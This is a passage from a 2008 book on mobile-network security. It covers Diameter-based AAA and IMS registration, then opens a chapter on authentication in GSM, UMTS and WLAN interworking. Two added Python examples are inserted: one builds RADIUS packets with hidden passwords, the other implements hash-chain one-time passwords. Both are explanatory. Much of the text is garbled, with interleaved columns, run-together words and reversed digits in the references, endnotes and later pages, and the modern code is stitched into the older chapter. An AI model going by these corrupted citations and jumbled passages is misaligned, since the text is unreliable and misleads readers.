12 REGISTER / response (P-CSCF to I-CSCF)
13 UAR (I-CSCF to HSS)
14 UAA (HSS to I-CSCF)
15 REGISTER / response (I-CSCF to S-CSCF)
16 SAR (S-CSCF to HSS)
17 SAA (HSS to S-CSCF)
18 200 OK (S-CSCF to I-CSCF)
19 200 OK (I-CSCF to P-CSCF)
20 200 OK (P-CSCF to MN)

supplied challenge (Step 12). Note that the I-CSCF may perform another UAR to obtain the assigned S-CSCF (Steps 13, 14), either because it is stateless or because it is another I-CSCF selected due to DNS load balancing. When the S-CSCF receives the second registration request, it validates the user's response (Step 15) and, if successful, issues a SAR to the HSS requesting its assignment for the user's session and requesting the user's profile. The HSS assigns the S-CSCF for the user's session and sends the user's profile back to it (Steps 16, 17). At this point (Step 18), the S-CSCF issues a SIP 200 OK message to the UA, and once received (Step 20), the registration process is complete.

For registered users, when the I-CSCF receives a SIP INVITE request, it queries the HSS for the assigned S-CSCF using the LIR command. If the user's profile is updated, the HSS informs the serving S-CSCF of this change by sending a PPR. The HSS may terminate the user's session by issuing an RTR message towards the S-CSCF (3GPP2 X.S0013-005-A, 2005). As we can see from this short IMS registration walkthrough as well as from the previous sections, Diameter is envisioned to be one of the fundamental protocols used in the future 3G/4G telecommunication infrastructures.

ISSUES AND FUTURE TRENDS

Many standardization and research efforts are underway to upgrade and enhance the current AAA architectures to exploit the security and the scalability benefits of Diameter in the areas of session management, mobility support, distributed online and off-line accounting, and QoS assurance for user services over heterogeneous wireless networks. For instance, Eyermann, Racz, Stiller, Schaefer, and Walter (2006) discuss possible enhancements to maintain consistent accounting reporting in heterogeneous multi-operator environments by introducing a new Diameter accounting application including new commands and AVPs to allow sharing session context information. Moreover,


efforts to attain seamless translation between RADIUS and Diameter are ongoing, especially in the areas of matching requirements between RADIUS and Diameter and in the translation of VSAs (Mitton, 2006).

As the future telecommunication networks are expected to be based on IPv6, Diameter implementations over IPv6 were tested and some issues were identified (Lopez, Perez, Skarmeta, & 2005). The tests were conducted based on the Open Diameter10 implementation. Integrating Diameter with MobileIPv6 is also an active area in both IETF and research. For example, 3GPP2 X.P0047-0 (2006) discusses possible enhancements for MobileIPv6 to exploit the security features of the Diameter applications for MobileIPv6 tunnel setup. It also proposes enhancing MobileIPv6 by using Diameter for dynamic selection of home agents.11

Finally, continuous efforts are being made to establish a standardized framework for end-to-end QoS for services starting from the calling user at the RAN and ending at the called party, whether it is located on the Internet or on another cellular network. 3GPP2 addresses such architectures in the service based bearer control draft document (3GPP2 X.S0013-012-0, 2006). It is noteworthy to mention that Diameter is quickly being considered to support many services. For instance, Kim and Afifi (2003) discuss the integration of GSM SIM-based authentication with the AAA over the Diameter-EAP application. Moreover, 3GPP2 has adopted Diameter architectures to support simple and multimedia messaging services (SMS and MMS) in 3GPP2 X.S0016-101-0 (2006).

SUMMARY

In this chapter we presented and discussed architecture and protocols for AAA as one of the most important design considerations in 3G/4G telecommunication networks. While many advances have been made to exploit the benefits of the current systems based on the RADIUS protocol, we illustrated its inherent security vulnerabilities. We then surveyed the details of the Diameter protocol and some of its applications. We showed that the Diameter protocol is not only the protocol of choice for the IMS architecture, but it also plays an increasingly important role in the three major network tiers, that is, access, distribution, and core. We demonstrated the role of Diameter in each tier by means of sample call flows in practical 1xEV-DO network architectures. We concluded the chapter with a short summary of the current and future trends related to Diameter-based AAA systems.

REFERENCES

3rd Generation Partnership Project 2 (3GPP2) X.S0013-000-A. (2005). All-IP core network multimedia domain—Overview (Ver. 1) (3GPP2: TSG X Series). Retrieved from http://www.3gpp2.com/Public_html/specs/X.S0013-000-A_v1.0_051103.pdf

3rd Generation Partnership Project 2 (3GPP2) X.S0013-005-A. (2005). All-IP core network multimedia domain—IP multimedia subsystem Cx interface signaling flows and message contents (Ver. 1) (3GPP2: TSG X Series). Retrieved from http://www.3gpp2.com/Public_html/specs/X.S0013-005-A_v1.0_051103.pdf

3rd Generation Partnership Project 2 (3GPP2) A.S0008-B v1.0. (2006). Interoperability specification (IOS) for high rate packet data (HRPD) radio access network interfaces with session control in the access network (3GPP2: TSG A Series). Retrieved from http://www.3gpp2.org/Public_html/specs/A.S0008-B_v1.0_061019.pdf

3rd Generation Partnership Project 2 (3GPP2) X.P0047-0 v1.0. (2006). MobileIPv6 enhancement (3GPP2: Draft). Retrieved from http://www.3gpp2.org/Public_html/Misc/X.P0047-0v0.5_VV_Due_08_January-2007.pdf

3rd Generation Partnership Project 2 (3GPP2) X.S0011-005-C. (2006). cdma2000 wireless IP network standard; Accounting services and 3GPP2 RADIUS VSAs (3GPP2: TSG X Series). Retrieved from http://www.3gpp2.org/public_html/specs/X.S0011-005-C_v3.0_061030.pdf

3rd Generation Partnership Project 2 (3GPP2) X.S0013-012-0. (2006). All-IP core network


Architecture and Protocols for AAA

multimedia domain—Service based bearer con- Camarillo, G., & García-Martín, M..)024( The
trol—Stage 2 (3GPP2:Draft). Retrieved from http:// 3G IP multimedia subsystem (IMS): Merging the
www.3gpp2.org/Public_html/Misc/X.P0013- Internet and the cellular worlds. John Wiley &
012_SBBC_Stage-2_VV_Due_11_Sept-2006.pdf Sons.
3rd Generation Partnership Project 2 (3GPP2) Eronen, P., Hiller, T., & Zorn, G. (2005). Diameter
X.S0016-101-0. (2006). Multimedia messaging ser- extensible authentication protocol (EAP) applica-
vice;MM1interface
0 basedondiameterprotocol tion (RFC 4072). Retrieved from http://www.ietf.
(3GPP2:Draft). Retrieved from http://www.3gpp2. org/rfc/rfc4072.txt
org/Public_html/SC/X.S0016-101-0_v1.0_060124.
Eyermann, F., Racz, P., Stiller, B., Schaefer, C.,
pdf
& Walter, T. (2006). Diameter-based accounting
Aboba, B. (2005). Re: End-to-end security in management for wireless services. In IEEE Wire-
RFC8.5 3 IETF Mail Archive, Message#01185. less Communications and Networking Conference
Retrieved from http://www1.ietf.org/mail-archive/ (WCNC’0)6 (Vol. 4, pp. 2305-2311).
web/aaa/current/msg01185.html
Fajardo, V., & Ohba, Y. (2006). Diameter base
Aboba, B., & Vollbrecht, J. (1999). Proxy chain- protocol details. In Theth 76 IETF meeting. San
ing and policy implementation in roaming (RFC Diego, CA. Retrieved from http://www3.ietf.org/
2607). Retrieved from http://www.ietf.org/rfc/ proceedings/06nov/slides/dime-3/dime-3.ppt
rfc2607.txt
Garcia-Martin, M., Ed., Belinchon, M., Pallares-
Aboba, B., & Wood, J. (2003). Authentication, Lopez, M., Canales-Valenzuela, C., & Tammi,
authorization and accounting (AAA) transport K. (2006). Diameter session initiation protocol
profile (RFC 3539). Retrieved from http://www. (SIP) application (RFC:4740). Retrieved from
ietf.org/rfc/rfc3539.txt http://www.ietf.org/rfc/rfc4740.txt
Braunöder, M. (2003). Plug and phone software. Hakala, H., Mattila, L., Koskinen, J.-P., Stura, M.,
Retrieved from http://samuel.labs.nic.at/at43/dic- & Loughney, J. (2005). Diameter credit-control ap-
tionary plication (RFC 4006). Retrieved from http://www.
ietf.org/rfc/rfc4006.txt
Calhoun, P., Bulley, W., & Farrell, S. (2002).
Diameter CMS security application. IETF: Kent, S., & Seo, K. (2005). Security architecture
DRAFT. Retrieved from http://www3.ietf.org/ for the Internet protocol (RFC 4301). Retrieved
proceedings/02mar/I-D/draft-ietf-aaa-diameter- from http://www.ietf.org/rfc/rfc4301.txt
cms-sec-04.txt
Kim, H., & Afifi, H..) 302 (Improving mobile
Calhoun, P., Johansson, T., Perkins, C., Hiller, T., authentication with new AAA protocols. In IEEE
& McCann, P. (2005). Diameter mobile IPv4 ap- International Conference on Communications
plication (RFC 4004). Retrieved from http://www. (ICC ’03) (Vol. 1, pp. 497-501).
ietf.org/rfc/rfc4004.txt
Lopez, M., Perez, G., & Skarmeta, A. (2005). Im-
Calhoun, P., Loughney, J., Guttman, E., Zorn, plementing RADIUS and diameter AAA systems
G., & Arkko, J. (2003). Diameter base protocol in IPv6-based scenarios. In IEEE Proceedings of
(RFC 3588). Retrieved from http://www.ietf.org/ theth 91 International Conference on Advanced
rfc/rfc3588.txt Networking and Applications(Vol. AINA’0
( )5
2,
pp. 851-855).
Calhoun, P., Zorn, G., Spence, D., & Mitton, D.
(2005). Diameter network access server applica- Mitton, D. (2006). Diameter/RADIUS vendor
tion (RFC 4005). Retrieved from http://www.ietf. specificAVPtranslation. IETF:DRAFT. Retrieved
org/rfc/rfc4005.txt from http://internet-drafts.osmirror.nl/draft-mit-
ton-diameter-radius-vsas-01.txt


Architecture and Protocols for AAA

Perkins, C. (2002). IP mobility support for IPv4 Remote Access Dial In User Service (RA-
(RFC 3344). Retrieved from http://www.ietf.org/ DIUS): RADIUS is an AAA protocol defined in
rfc/rfc3344.txt RFCs 2865 and 2866.
Perkins, C., & Calhoun, P. (2005). Authentication,
authorization, and accounting (AAA) registration
keys for mobile IP (RFC 3957). Retrieved from EndnotEs
http://www.ietf.org/rfc/rfc4301.txt 1
MMD is defined in all-IP core network
Rigney, C. (1998). 2.4.10 Remote authentication dial- standards (TSG X series) found at http://
in user service (radius). Snapshot of the 41st IETF www.3gpp2.org/.
meeting. In Proceedings of the IETFMarch.89 1 2
Notice that the authentication and the au-
Retrieved from http://www3.ietf.org/proceedings/ thorization operations are not separated in
98mar/98mar-edited-79.htm RADIUS. In other words, to obtain a user’s
authorization set, user must be successfully
Rigney, C. (2000). RADIUS accounting (RFC 2866).
authenticated.
Retrieved from http://www.ietf.org/rfc/rfc2865.txt 3
UDP ports 1812 and 1813 are the standard ports
Rigney, C., Willats, W., & Calhoun, P. (2000). assigned for authentication and accounting
RADIUS extensions (RFC 2869). Retrieved from respectively.
http://www.ietf.org/rfc/rfc2869.txt 4
Inter-domainAAAtrafficcrossinguntrusted
networks such as in roaming scenarios is usu-
Rigney, C., Willens, S., Rubens, A., & Simpson, W.
ally secured by dedicated VPNs.
(2000). Remote authentication dial in user service 5
According to (Aboba, 2005, message 01185)
(RADIUS) (RFC 2865). Retrieved from http://www.
end-to-end security through Diameter CMS
ietf.org/rfc/rfc2865.txt
(Calhoun, 2002) mentioned in the standard
Rosenberg, J., Schulzrinne, H., Camarillo, G., John- (Calhoun, 2003, RFC 3588) has been aban-
ston, A., Peterson, J., Sparks, R., et al. (2002). SIP: doned and resolved by the introduction of the
Session initiation protocol (RFC 3261). Retrieved DiameterEAPapplicationdefinedin(Eronen,
from http://www.ietf.org/rfc/rfc3261.txt 2005, RFC4702).
6
If a loop exists, the message is rejected with
Wikipedia. (n.d.). RADIUS. Retrieved from http:// a DIAMETER_LOOP_DETECTED error
en.wikipedia.org/wiki/RADIUS message
7
More complex procedures may apply in case
kEy tErMs of translation.
8
Loosely speaking the user’s password
9
Diameter: Diameter is a new AAA protocol These commands are based on the Diameter
presented in RFC 3588 to replace RADIUS. CxApplicationApplication-
( ID, )6 1 2 7=6 1
more details can be found in (3GPP2 X.S0013-
IP Multimedia Subsystem (IMS): IP multi- 005-A, 2005; 3GPP2 X.S0013-006-A,
media subsystem is an access agnostic architecture 2005).
proposed as a core technology for the next genera- 10
The Open Diameter project, located at [http://
tion services. www.opendiameter.org/], offers open source
C++ implementation of the Diameter base
One Carrier Evolution Data Only (1xEV-
protocol.
DO): 1xEV-DO is a CDMA2000 based cellular 11
Dynamic Home Agent (DHA) selection is
access technology proposed to support high rate
a method used to dynamically select home
data services.
agent based on the geographic location of the
user such that the network backhaul delay is
minimized.




Chapter XIII
Authentication, Authorisation,
and Access Control in
Mobile Systems
Josef Noll
University Graduate Center – UniK, Norway

György Kálmán
University Graduate Center – UniK, Norway

AbstrAct

Converging networks and mobility raise new challenges towards the existing authentication, authorisa-
tion, and accounting (AAA) systems. Focus of the research is towards integrated solutions for seamless
service access of mobile users. Interworking issues between mobile and wireless networks are the basis
for detailed research on handover delay, multi-device roaming, mobile networks, security, ease-of-use,
and anonymity of the user. This chapter provides an overview over the state of the art in authentication
for mobile systems and suggests extending AAA mechanisms to home and community networks, taking
into account security and privacy of the users.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

INTRODUCTION

Today's pervasive computing environments raise new challenges for mobile services. In future visions, a converged user access network is projected. This means that one network will be used to deliver different services, for example, broadcast TV, telephony, and Internet. Composed from mobile (e.g., Universal Mobile Telecommunications System [UMTS]), wireless (IEEE 802.11, IEEE 802.16, IEEE 802.20), and wired (cable, Asymmetric Digital Subscriber Line [ADSL]) networks, these networks hide the border between the telecom, broadcast, and computer networks. The common service enables roaming terminals, which can access services independently of the currently used networking technology. Market players in both areas transform into wireless service providers across access networks. Telecoms provide packet switched data and mobile services over the fixed network, while Internet service providers run voice over IP (VoIP) and video on demand (VoD) over mobile networks.

The changing environment also changes the management plane of the underlying networks. Providers on converged networks have to change their accounting and billing methods and need to redefine their business models. While commercial players demonstrate early examples, research in the AAA area focuses on providing a backplane for the upcoming ubiquitous services run over converged networks.

BACKGROUND

The AAA methods employed in current networks were developed for a single type of network, resulting in two different systems, one for telecommunication services and one for computer networks. This chapter addresses AAA in the global system for mobile communications (GSM) and UMTS, and computer network solutions based on Internet Engineering Task Force (IETF) standards.

The computer networks provide a unified AAA access, and research focuses on extending the existing methods to be suitable for telecommunication services. Extensions for Remote Authentication Dial In User Service (RADIUS) and Diameter are proposed. RADIUS is the current de facto standard for remote user authentication. It uses the User Datagram Protocol (UDP) as transport. Authentication requests are protected by a shared secret between the server and the client: the client hides the user password with an MD5 keystream derived from the secret and a per-request random authenticator, and the server proves possession of the secret with an MD5 response authenticator. Everything else in the request, including the user name, is sent in plaintext, and the request itself carries no integrity check unless the optional Message-Authenticator attribute (RFC 2869) is used. The Diameter protocol provides an upgrade possibility as compared to RADIUS. While enhancing security through reliable, supervised transport (TCP or SCTP) and hop-by-hop IPsec or TLS protection against man-in-the-middle attacks, it lacks backward compatibility.

Both methods have a different background. The computer networks targeted the person using a computer in a fixed network environment, while mobile systems addressed a personal device in a mobile network. Thus a challenge for telcos is to extend seamless network authentication towards user authentication for service access. Most telcos are also Internet service providers (ISPs), so this would be a natural unification of their AAA systems.

A generic approach is taken by extension of the Extensible Authentication Protocol (EAP) family. Development efforts of the Internet and telecommunication world were united on EAP. This protocol family has the potential for becoming the future common platform for user authentication over converged networks. EAP is a universal authentication framework standardised by the IETF, which includes the authentication and key agreement (AKA) and Subscriber Identity Module (SIM) methods. EAP-AKA carries the AKA procedure that is the standard authentication method of UMTS networks.

Beside the fundamental differences of communication and computer networks, mobility is the key issue for both. Network services should not only be accessible from mobile terminals, but they should be adapted to the quality of service (QoS) requirements of a mobile/wireless link. Improvements of AAA methods are of fundamental importance for mobility, providing fast handover and reliable and secure communications on a user-friendly and privacy protecting basis.

Subscriber Authentication in Current Networks

In GSM networks, the integrated AAA is used for any type of user traffic. The authentication is one-way only: the user has to authenticate himself/herself towards the network, but the network does not authenticate itself to the user.

To be more precise, the user is authenticated with a PIN code towards the SIM in the mobile phone, then the device authenticates itself towards the network. Device authentication instead of user authentication can hinder the upcoming personalised services because it is hiding the user behind the device. In UMTS, the authentication of the device is two-way: the device can also check the authenticity of the network with the help of keys stored on the SIM.

Integration of the mobile authentication with different external services is not widespread. The telecom providers have some internal services which can authenticate the subscriber based on the data coming from the network. Credentials could basically be the CallerID, the Temporary Mobile Subscriber Identity (TMSI), or other data transformed with a hash function. Access control and authorisation is more an internal network task. Without considerable extension, the current mobile networks are more islands than connecting networks in the area of AAA. Equipment manufacturers are now recommending various IP multimedia subsystem (IMS) solutions for mobile providers in order to enable integrated and third party service convergence and to enable multimedia content over today's networks.

AAA protocols employed in computer networks are meant to provide services for authenticated users. Current single sign-on (SSO) protocols like RADIUS, Diameter, or Kerberos provide the identity of the user to third parties. SSOs can use digital certificates, public key infrastructure (PKI), and other strong cryptographic methods. But none of them is able to provide such a complete solution as the integrated AAA of the mobile network. Computer network protocols lack support for fast mobility of moving clients and are not optimised for low bandwidth connections.

By incorporating the seamless authentication used in network-internal services in the telecom world and the SSO solutions provided by various protocols from computer networks, a unified AAA system will achieve enhanced user acceptance and security. In such a system, secure key storage and tamper resistant handling is crucial. Smart cards for key storage and generation will fulfil the security requirements, but usage and distribution of the smart cards is cumbersome. As most users have a mobile phone, the SIM card is a candidate to be the primary smart card used for AAA in a ubiquitous environment (Kálmán & Noll, 2006).

AAA IN CONVERGED NETWORKS

A converged network carries several types of traffic and enables seamless information exchange between different terminals, regardless of transport medium. To enable converged AAA, research work is going on in different areas: enabling wireless LAN (WLAN)-mobile network interworking, enhancing network mobility in wireless computer networks, and reducing resource requirements in cryptography.

Interworking between Mobile and Wireless Networks

Network convergence is most significant in the wireless environment, having to face varying QoS measures on the radio interface, for example, propagation delay, variation of delay, bit error rate, error free seconds, distortion, signal to noise ratio, duration of interruption, interruption probability, time between interruptions, bit rate, and throughput. These parameters will depend on the user and terminal environment and underline that an optimum service access will have to use all available wireless and mobile connections. Leu, Lai, Lin, and Shih (2006) have provided the fundamental differences of these networks, summarised in Table 1.

Table 1. Comparison of cellular and WLAN networks

                    Cellular       WLAN
Coverage            Country-wide   Local
Security            Strong         Depends on setup
Transmission rate   Low            High
Deployment cost     High           Low
License fee         Very high      No need
Construction        Difficult      Easy
Mobility support    High           Poor

Increased demand for security has improved the security on wireless links, resulting in Wi-Fi protected access (WPA), based on a draft of the IEEE 802.11i standard, and WPA2, its full implementation. This standard aims at incorporating protocols of the EAP family, especially transport layer security (TLS) and SIM.

Figure 1. Authentication in GSM and UMTS

Most cellular operators are now providing WLAN services using the Universal Access Method (UAM) for authentication. UAM uses a layer 3 authentication method, typically a Web browser, to identify the client for access to the WLAN. This raises the problem of mutual authentication, which has been a problem also in GSM networks. By extending to EAP-SIM it would be possible to enable SIM-based authentication in these environments for SIM-enabled devices.

Roaming between access providers is a second issue. Since data between access points are carried over an IP backbone, it is natural to use a network-based protocol such as RADIUS, as suggested by Leu et al. (2006). Transport encryption inside the backbone is no different from normal wired practice, hence out of scope for this chapter. In a converged network, where users can switch between mobile networks and WLAN services, a common AAA system has to be operational to ensure correct operation. A unified billing scheme is proposed by Janevski et al. (2006), suggesting to use 802.1X on the WLAN side as shown in Figure 2. The mobile network's WLAN connection is suggested through the RADIUS server used also for access control in 802.1X.

The use of the IEEE 802.1X standard allows seamless authentication, since preshared certificates and key negotiation are provided to the cellular network, where the user is already authenticated. With the use of digital certificates, the system is getting closer to the preferred view of pervasive systems, where the user and the service providers are mutually identified. Since these systems authenticate the user towards several services, privacy is a primary concern. A possible solution, recommended by Ren, Lou, Kim, and Deng (2006), is a secure authentication scheme that preserves user privacy.

In pervasive environments a user will experience seamless authentication to all services when connected through an SSO service. Malicious tracking of his/her behaviour or eavesdropping on authentication messages can compromise the user credentials. The SSO service has to be extremely prudent when sending user-related information. Keeping a reasonable level of privacy, the system should deal with questions of location privacy, connection anonymity, and confidentiality (Ren et al., 2006). The recommendations are based on blind signatures and hash chains. Using hashes is highly recommended, since a good hash function can provide a good foundation for anonymous access and its resource needs are not too high for current mobile devices, as blind signatures based on the Rivest-Shamir-Adleman (RSA) scheme sometimes may be. In certain environments, the GSM integrated functions may also be used.

The user retains full control over authentication credentials when composing and generating authentication tokens like the identities suggested by Chowdhury and Noll (2007). Initial service access can be achieved by showing one of these tokens after mutual identification between the service and the user. Based on these tokens, no user data can be retrieved nor traced back. If all of the initial identification steps succeed, the exchange of the required credentials can proceed using a freshly negotiated session key.

The base of most authentication techniques is a preshared key, delivered to the user device out-of-band. Authentication can be done for example in mobile phones by inserting a master private key on the SIM at the activation of the card (Kálmán & Noll, 2006).

A different approach is to extend the current mobile network with additional elements to enable network integrated AAA also in an Internet environment. Khara, Mistra, and Saha (2006) suggest including a new node, called Serving GPRS Access Router. This entity acts as a gateway for the WLAN traffic to enter the general packet radio service (GPRS) backbone and enables GPRS signalling to control the WLAN. The new protocol set eliminates the need of Signalling System 7 (SS7) in addition to the IP backbone. Khara et al. claim that this solution is superior in terms of speed and overhead compared to the RADIUS-based methods suggested previously. The main drawback is the need of special dual mode devices with a split IP layer, a solution which might not be practical having in mind the basis of 2.5 billion mobile phones available in the market.

For mobile devices, limited computational resources and battery power require an effective AAA mechanism. Extension of the GPRS/UMTS network could be potentially more expensive than deploying RADIUS authentication. Handover delay caused by terminal mobility is an issue which might favour GPRS/UMTS protocols.

Figure 2. Integration of RADIUS and mobile network authentication
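The RADIUS shared-secret mechanism summarised in the Background section above, as an added worked example (this is not code from the chapter or from any RADIUS implementation; the user name, password, shared secret and the fixed Request Authenticator are constructed test values): it builds an Access-Request with the User-Password hidden as in RFC 2865 section 5.2, answers it with an Access-Accept carrying the Response Authenticator of RFC 2865 section 3, and shows what an on-path observer sees and what each side can verify.

```python
"""RADIUS shared-secret protection (RFC 2865): User-Password hiding and the
Response Authenticator. Added example, not code from the chapter."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2          # packet codes, RFC 2865 s.3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2     # attribute types, RFC 2865 s.5


def hide_password(password, secret, request_authenticator):
    """RFC 2865 s.5.2: pad with NULs to a 16-byte multiple, then for each block
    c_i = p_i XOR MD5(secret + c_{i-1}), with c_0 = Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), request_authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        out += block
        prev = block
    return bytes(out)


def unhide_password(hidden, secret, request_authenticator):
    """Inverse of hide_password (server side); trailing NUL padding is stripped."""
    out, prev = bytearray(), request_authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return bytes(out).rstrip(b"\x00")


def attribute(attr_type, value):
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def packet(code, identifier, authenticator, attrs):
    return struct.pack("!BBH", code, identifier, 20 + len(attrs)) + authenticator + attrs


def access_request(username, password, secret, identifier=1, request_authenticator=None):
    """Client side. The Request Authenticator must be fresh and unpredictable in
    real use; a caller-supplied one is accepted here only for reproducible tests."""
    ra = request_authenticator or os.urandom(16)
    attrs = attribute(ATTR_USER_NAME, username) + \
        attribute(ATTR_USER_PASSWORD, hide_password(password, secret, ra))
    return packet(ACCESS_REQUEST, identifier, ra, attrs)


def response_authenticator(code, identifier, length, request_authenticator, attrs, secret):
    """RFC 2865 s.3: MD5(Code | ID | Length | RequestAuth | Attributes | Secret)."""
    header = struct.pack("!BBH", code, identifier, length)
    return hashlib.md5(header + request_authenticator + attrs + secret).digest()


def access_accept(request, secret, attrs=b""):
    """Server side: answer the request, proving possession of the shared secret."""
    identifier, ra = request[1], request[4:20]
    auth = response_authenticator(ACCESS_ACCEPT, identifier, 20 + len(attrs), ra, attrs, secret)
    return packet(ACCESS_ACCEPT, identifier, auth, attrs)


def verify_response(response, request, secret):
    """Client side: the only integrity check RFC 2865 itself gives the client."""
    code, identifier, length = struct.unpack("!BBH", response[:4])
    if length != len(response) or identifier != request[1]:
        return False
    expected = response_authenticator(code, identifier, length, request[4:20], response[20:], secret)
    return hmac.compare_digest(expected, response[4:20])


def parse_attributes(pkt):
    """Return {type: value} exactly as an on-path observer would see them."""
    attrs, i = {}, 20
    while i < len(pkt):
        attr_type, length = pkt[i], pkt[i + 1]
        attrs[attr_type] = pkt[i + 2:i + length]
        i += length
    return attrs
```

Two things the code makes visible: the User-Name attribute is readable by anyone on the path, and the password hiding is a keystream XOR, so an observer who knows one password and its Request Authenticator recovers the first 16 keystream bytes for that request. The Response Authenticator binds the answer to the request and the secret, but nothing in the Access-Request itself is authenticated unless the HMAC-MD5 Message-Authenticator of RFC 2869 is added.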

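Hash chains as a lightweight basis for anonymous access, mentioned above with Ren et al. (2006) and again under Security and Computing Power below for one-time passwords on smart cards, as an added example that is not the chapter's or any cited paper's scheme: the client (the smart-card/SIM role) commits to the anchor of a SHA-256 chain under a random pseudonym, each login reveals the next preimage, and the server verifies with a bounded number of hashes without ever holding the seed or a subscriber identity. The chain length, pseudonym format and skip window are assumptions for the demonstration.

```python
"""One-time authentication with a hash chain (Lamport-style). Added example,
not the chapter's or any cited paper's scheme."""
import hashlib
import hmac
import os


def H(data):
    return hashlib.sha256(data).digest()


class ChainClient:
    """Client side (the smart-card/SIM role). Holds the seed and the chain."""

    def __init__(self, seed, length):
        chain = [seed]                       # chain[i] = H^i(seed)
        for _ in range(length):
            chain.append(H(chain[-1]))
        self._chain = chain
        self.length = length
        self._next = length - 1              # first OTP is H^(n-1)(seed)

    def anchor(self):
        """H^n(seed): the only value the server ever receives at enrolment."""
        return self._chain[self.length]

    def next_otp(self):
        if self._next < 0:
            raise RuntimeError("chain exhausted: enrol a fresh chain")
        otp = self._chain[self._next]
        self._next -= 1
        return otp

    def remaining(self):
        return self._next + 1


class ChainServer:
    """Server side. Stores, per pseudonym, only the last value it accepted."""

    def __init__(self, max_skip=5):
        self._last = {}
        self.max_skip = max_skip         # tolerate up to this many lost OTPs

    def enrol(self, pseudonym, anchor):
        self._last[pseudonym] = anchor

    def authenticate(self, pseudonym, otp):
        current = self._last.get(pseudonym)
        if current is None:
            return False
        candidate = otp
        for _ in range(self.max_skip):   # bounded work per attempt
            candidate = H(candidate)
            if hmac.compare_digest(candidate, current):
                self._last[pseudonym] = otp   # move the chain head forward
                return True
        return False                      # replay, forgery, or too many skipped


def enrol_new_chain(server, length=20):
    """Enrolment under a random pseudonym (assumed format): the server learns
    neither the seed nor any subscriber identity, only an unlinkable anchor."""
    seed = os.urandom(32)
    pseudonym = os.urandom(8).hex()
    client = ChainClient(seed, length)
    server.enrol(pseudonym, client.anchor())
    return pseudonym, client
```

Each login costs the server at most max_skip hashes and the client nothing beyond a table lookup (a card would recompute from the seed instead of storing the chain), which is why the text favours hash-based schemes over RSA blind signatures on constrained devices. The limits are equally visible: a reused value is rejected as a replay, more than max_skip lost values desynchronise the parties, the chain runs out and must be re-enrolled, and the scheme authenticates only, it does not agree a session key.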
Authentication, Authorisation, and Access Control in Mobile Systems

Authentication in converged could be done in reasonable time if they are coop-


networks erating, but with introducing converged network
access, it is likely that the terminal moves between
From the data traffic’s point of view, the WLAN speedand UMTS networks and back in less
of the network’s internal routines does not play a than a minute. Session mobility, for example a
primary role, in VoIP and other sensitive services, VoIP call without interruption, cannot be achieved
QoSisakeyparameter.Delayreductioniscurrently using current protocols. The key is to reduce the
the topic having intensive focus. Interconnecting handoff delay in interworking networks. To reduce
mobile and IP networks for data traffic is not
delay insideathe UMTS network, Zhang and Fu-
challenge, since GPRS has an IP backbone, and jise (2006) show a possible improvement for the
UMTS is practically an IP network. Most of the integrated authentication protocol. One cause of
problems begin when the network has to provide the long delay is getting an authentication vector
a certain QoS in order to support service (AV) if the with
Serving GPRS Support Node (SGSN)
time-critical transmission, that is, voice or video and Home Location Register (HLR) are far away.
calls. Delay in the wired network can be reduced by While roaming, the AV consumption is higher, if
additional bandwidth to reduce collisions, alternate the terminal is moving frequently or it is producing
routing paths, or other methods. But in wireless significanttraffic.Thespecificationsallowahigh
environments, where terminals move around and blocking ratio of 20% for the UTMS network in
connect to different networks, which may be “far” case of requesting new AVs. The proposal claims
away in terms of network topology, switching the to lower this rate to 2%. For each authentication
data transfer path is a challenging task. instance,theSGSNconsumesoneAVfromafirst
In the IP world, Mobile IPv6 (MIPv6) was infirstout(FIFO)storage.
introduced to deal with mobility problems. This A fundamental question is to allow the size
protocolworksawlessly fl forclients - that
of theare AVchang
vector to be customised based on the
ing networks with quite low frequency and are terminal’s behaviour. In the default way, the SGSN
connected to a wired network, where additional executes a distribution of authentication vector
signalling and other overheads are not causing (DAV) procedure if all AVs are consumed. Com-
bandwidth problems. The convergence time of munication between the terminal and the SGSN
the routing in MIPv6 is quite slow. In a wireless cannot proceed until the reply is received from
environment every additional message exchange the HLR, inserting a potentially high delay into
orsignallingoverheadhasadirect - inflthe
uence onus
system. This can lead to call failure, errors in
ability. When the terminal is moving fast between location update, or unacceptable delays in services
these distant networks, it may reach a speed, where running on GPRS. The proposed protocol from
the routing of MIPv6 can not keep the connection Zhang and Fujise (2006) implies no change in case
inacorrectstate.Thismeansthatwhile ofthe data first authenticationtotheSGSN,butkeeps
traffic
could be able to transmit with low average speed, track of the number of available AVs and sends out
QoScannotbekeptonanadequatelevel - anew to request
sup whenhittingapredefinedlevel.This
portVoIPorVoDservices,forexample.Tofight level can be customised for a network, to reduce or
this problem, several micromobility (local area) even remove the possible delay of waiting for an
protocols were developed to support fast moving AV. The proposal also changes the basic behaviour,
nodes. Different approaches are used, for example asking for new AVs when they are consumed. The
in hierarchical MIPv6 with fast handover adds a lo- original 3rd Generation Partnership Project (3GPP)
cal home agent into the network. Seamless handoff system asks for them when a new event comes in
for MIPv6 tries to lower the handover time with and no AVs are available.
instructing the nodes to change networks based While reducing delay inside the GPRS network
on precalculated patterns. can reduce block probability in reaching network
Handoff between neighbouring IP networks services, also handover functions in IP have to be


Authentication, Authorisation, and Access Control in Mobile Systems

revised in order to achieve reasonably fast mobil- was enabled by embedding the BU message into
ity support. The basic challenge is that currently the AAA request message and so optimising the
AAA and MIPv6 are operated independently. This route while authenticating. This solution can solve
means that the terminal has to negotiate with two MIPv6’s basic problem of supporting different
different entities in order to get access to the new administrative domains and enable scalable large
network. scale deployment.
In MobileIPv6, the terminal is allowed to keep Lee,Huh,Kim,andLeedefine 0 2 6) ( anovel
connections to a home agent (HA) and a cor- communication approach to enable communica-
respondent node (CN), even when the terminal tion between the visited AAA servers for a faster
changes point of attachment to that network. The andmoreefficientauthenticationmechanism.Ifa
terminal has two addresses, the home address terminal visits a remote network, the AAA must
(HoA) and the care-of address (CoA). The HoA be done by the remote system. IETF recommends
